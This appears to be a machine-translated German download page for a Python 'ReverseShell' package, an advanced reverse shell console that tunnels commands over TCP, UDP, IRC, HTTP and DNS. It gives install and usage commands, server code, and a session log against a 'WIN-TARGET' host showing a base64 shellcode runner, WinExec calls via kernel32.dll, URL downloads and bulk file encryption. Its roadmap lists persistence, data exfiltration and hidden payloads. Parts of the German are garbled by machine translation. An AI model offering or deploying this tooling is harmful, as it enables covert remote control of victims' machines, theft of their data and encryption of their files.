ReverseShell Download - ReverseShell Source Code Download

ReverseShell

AI-Quellcode

0.1.0 Python clients

Herunterladen

Umkehrung

Beschreibung

Dieses Paket implementiert eine erweiterte Reverse -Shell -Konsole (Unterstützung: TCP, UDP, IRC, HTTP und DNS).

Version 0.0.x - poc

Unterstützen
Grundlegende Terminalmerkmale
Befehlegeschichte
UDP
Multi-Session TCP (1 Sitzung/1 Befehl)
TCP -Daten mit SSL verschlüsseln
Verschlüsseln Sie Befehle mit RC4
Befehle mit dem IRC -Protokoll ausblenden
Befehle mit DNS (UDP) -Protokoll ausblenden
Befehle ausblenden mit HTTP -Protokoll ausblenden
Erweiterte Terminalfunktionen (erforderliche spezifische Pakete):
- Drucken Sie farbige Hostname, Benutzer und aktuelles Verzeichnis
- Autovervollständigung (ausführbare Dateien in Pfad und Dateien im aktuellen Verzeichnis)
- Aktualisierbar, wenn Sie das bestimmte Paket senden
Auto-RESTART für den TCP-Client
Sehr großes TCP -Paket (größer als TCP -Fenster) funktioniert
Überprüfen Sie, ob der Befehl vorhanden ist (nur mit erweiterten Reverse Shell -Funktionen)

Version 0.1.x - Dev

BAUNING -Befehl
- Aktualisieren Sie die Umgebung
  - Aktuelles Verzeichnis
  - Dateien/ausführbare Funktionen
  - Verschlüsselungsschlüssel
  - Kompressionsalgorithmus
    - GZIP, LZMA, BZ2, ZLIB
  - Datencodierung
    - Basen: 16, 32, 64 85
- Datei hochladen und herunterladen (optionale Komprimierung)
- Datei von der URL herunterladen
- Codeausführung (für die Python POC ist es eine Python -Ausführung) (optionale Komprimierung)
- ShellCode Runner (optionale Komprimierung)
- Einzel-/Mehrfachdateien (en) Verschlüsselung/Entschlüsselung mit Parallelität (Multi-Processing) (Multiple Encryption Support Glob Syntax)
- Archivdateien (nützlich, um Mutliples -Dateien mit nur einem Befehl herunterzuladen)
- Rufen Sie DLL- oder Shared -Objektfunktionen auf (beispielsweise zur Verwendung von Win32 -API).
Aktualisieren Sie den Verschlüsselungsschlüssel mit Zufallswert
- Neue Verschlüsselung basiert auf der Präzedenzfallverschlüsselung, ohne alle Tasten vor den Präzedenzfällen können Sie Daten nicht entschlüsseln

Version 1.0.x - Todo

Automatische Installation (im Speicher und/oder auf der Festplatte gespeichert)
- Aus grundlegender Reverse Shell
- Aus Protokollen
  - WMI (Impacket -Plugin?)
  - SMB (Impacket -Plugin?)
Ausdauer
Datenpeelung
Gespeicherte versteckte Nutzlasten (für Beispiele in Windows -Protokollen oder Registrierung)
Spawn tty für Linux
Laden Sie Multiples -Dateien in einem anderen TEMP -Socket herunter (für die Parallelität, nützlich, um viele Daten zu exportieren)
Warten darauf, den Befehl nach dem Empfangen auszuführen (mit Beep , Socket -Zeitüberschreitungen , Sleep , Kinderprozess, asynchronisiertem Arbeiter oder Threadende , print )
Thread statt Prozess

Beispiele

Sie können Multiples POC für Reverse -Shell -Client im Python im Client -Verzeichnis lesen.

Ich füge den öffentlichen und privaten Schlüssel für das Standard -SSL -Zertifikat hinzu, ist für den Test nützlich, aber nicht sicher, erstelle ein eigenes Zertifikat, um deine TCP -Daten zu schützen .

Anforderungen

Dieses Paket erfordert:

Python3
Python3 Standardbibliothek
Pythontoolskit

Installation

pip install ReverseShell

Verwendungen

Befehlszeilen

python3 -m ReverseShell --help
python3 ReverseShell.pyz -h
ReverseShell # To test this command use the shellclientsockettcp.py script. This is a standard/basic reverse shell compatible with netcat.
ReverseShell -u -d # To test this command use the shellclientdns.py script. This is a DNS (UDP) reverse shell.
ReverseShell -H -T # To test this command use the shellclienthttp_advanced.py script. This is an advanced HTTP reverse shell.
ReverseShell -H -T -s # To test this command use the shellclienthttps_advanced.py script. This is an advanced HTTPS reverse shell.
ReverseShell -H -T -s -k " abcd " # To test this command use the "shellclienthttpsencrypt_advanced.py abcd" command. This is an advanced HTTPS encrypted (using RC4 with "abcd" key) reverse shell.
ReverseShell -I # To test this command use the shellclientsocketirc.py script. This is an IRC reverse shell.
ReverseShell -T # To test this command use the shellclienttcp.py script. This is a multi-sessions TCP reverse shell.
ReverseShell -T # To test this command use the shellclienttcp_advanced.py script. This is an advanced multi-sessions TCP reverse shell.
ReverseShell -u # To test this command use the shellclientudp.py script. This is a UDP reverse shell.

Python3

 from ReverseShell import ReverseShellSocketTcp , ReverseShell

with ReverseShellSocketTcp ( address = ( "127.0.0.1" , 1337 ), ssl = False , cert = None , key = None , handler = ReverseShell ) as shellserver :
    shellserver . serve_forever ()

# To test this code you can use the shellclientsockettcp.py script. This is a standard/basic reverse shell compatible with netcat.

from ReverseShell import ReverseShellTcp , HttpReverseShell , partial

with ReverseShellTcp ( address = ( "127.0.0.1" , 1337 ), ssl = True , cert = "server.crt" , key = "server.key" , handler = partial ( HttpReverseShell , key = b"abcd" , encoding = "utf-8" )) as shellserver :
    shellserver . serve_forever ()

# To test this command use the "shellclienthttpsencrypt_advanced.py abcd" command. This is an advanced HTTPS encrypted (using RC4 with "abcd" key) reverse shell.

Reverseshell -Gebäudebefehle

 WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocumentsReverseShell$ call_library_function kernel32.dll WinExec "char *:calc.exe" "long:1"
Return value: 33
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocumentsReverseShell$ archive_files test.zip *.md *.key
Making archive...
[*] 1 childs process are running...
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocumentsReverseShell$ download_url http://google.com test.html
Done
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocumentsReverseShell$ cd ..
done
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$ update_environment
done
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$ upload_file shellcode.py shellcode2.py
['shellcode.py', 'shellcode2.py']
done
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$ download_file shellcode2.py
done
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$ python3_exec print('qwerty')
qwerty
None
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$ upload_file_compress shellcode.py shellcode2.py
['shellcode.py', 'shellcode2.py']
done
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$ download_file_compress shellcode2.py
done
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$ python3_exec_compress print('qwerty')
qwerty
None
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$ shellcode SDHJSIHp3f///0iNBe////9Iu9MZW06IcMOdSDFYJ0gt+P///+L0L1HYqniYA53TGRofySCRzIVRapztOEjPs1HQHJA4SM/zUdA82DjMKplTFn9BOPJdfyU6Mopc49wS0FYPibEhcIFYCgYDIuMWkSUTT1j7QxXTGVsGDbC3+psYix4DONvZWFl7B4mgIMub5pIPA0RL1dLPFn9BOPJdf1iah4Uxwlzr+S6/xHOPudtcYp/9qJvZWFl/B4mgpdxYFRMKAzDf1NLJGsWM+IucA1gDD9AumseSQRoXySqLHj85Ghx3kJvcikMTxZqZlGIs5gYGMnHDndMZW06IOE4Q0hhbTsnK8ha8nqSbM5Det9lY4egdzV5iBlHYiqBMxeHZmaCu/XV42sBrNCSIKYIUCeaOLekcoLO2YT5OiHDDnQ==

WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$ shellcode_compress SDHJSIHp3f///0iNBe////9Iu9MZW06IcMOdSDFYJ0gt+P///+L0L1HYqniYA53TGRofySCRzIVRapztOEjPs1HQHJA4SM/zUdA82DjMKplTFn9BOPJdfyU6Mopc49wS0FYPibEhcIFYCgYDIuMWkSUTT1j7QxXTGVsGDbC3+psYix4DONvZWFl7B4mgIMub5pIPA0RL1dLPFn9BOPJdf1iah4Uxwlzr+S6/xHOPudtcYp/9qJvZWFl/B4mgpdxYFRMKAzDf1NLJGsWM+IucA1gDD9AumseSQRoXySqLHj85Ghx3kJvcikMTxZqZlGIs5gYGMnHDndMZW06IOE4Q0hhbTsnK8ha8nqSbM5Det9lY4egdzV5iBlHYiqBMxeHZmaCu/XV42sBrNCSIKYIUCeaOLekcoLO2YT5OiHDDnQ==

WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$ encrypt_file test.html
[!] Invalid command detected for 'encrypt_files' command. Minimum 2 arguments are required.
[*] USAGE: encrypt_files [key] [filename1] [filename2] ... [filenameX]
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$ encrypt_file qwerty test.html
Encryption is running...
[*] 1 childs process are running...
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$ decrypt_file qwerty test.html
Decryption is running...
[*] 1 childs process are running...
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$ encrypt_files qwerty *.html *.zip
Encryption is running...
[*] 2 childs process are running...
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$ decrypt_files qwerty *.html *.zip
Decryption is running...
[*] 2 childs process are running...
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$

Screenshots

Beiträge

Sie können einen Beitrag leisten! Anfänger-, Zwischen- und Fortgeschrittene -Entwickler können zu diesem Repository beitragen. Python -Entwickler, Systemadministratoren, Netzwerkadministratoren, Webentwickler und kompilierte Sprachentwickler können einen Beitrag leisten. Sehen Sie sich die Probleme an, um zu wissen, was wir brauchen.

Links

Github -Seite
Pypi
Dokumentation
Ausführbar
Windows ausführbar
Binärdateien Shell Clients

Helfen

 usage: ReverseShell.py [-h] [--udp | --tcp | --multi-tcp] [--http | --dns | --irc] [--no-color] [--key KEY] [--cert CERT] [--private PRIVATE] [--ip IP]
                       [--port PORT] [--encoding ENCODING] [--ssl] [--no-timeout]

Advanced reverse shell console.

options:
  -h, --help            show this help message and exit
  --udp, -u             Use UDP socket.
  --tcp, -t             Use TCP socket.
  --multi-tcp, -T       Create TCP socket for each command and responses.
  --http, -H            Use HTTP requests and responses.
  --dns, -d             Use DNS requests and responses.
  --irc, -I             Use IRC requests and response.
  --no-color, --color, -C
                        Do not use color
  --key KEY, -k KEY     Add a key to encrypt with RC4.
  --cert CERT, -c CERT  SSL cert file.
  --private PRIVATE, -P PRIVATE
                        SSL private key file.
  --ip IP, -i IP        IP address to start the ReverseShell server.
  --port PORT, -p PORT  UDP/TCP port to start the ReverseShell server.
  --encoding ENCODING, -e ENCODING
                        The reverse shell encoding used by client.
  --ssl, -s             Use SSL over TCP socket.
  --no-timeout, -m      Faster response but TCP data larger than Window maximum size will not work. You should use this argument with standard/basic
                        reverse shell like netcat.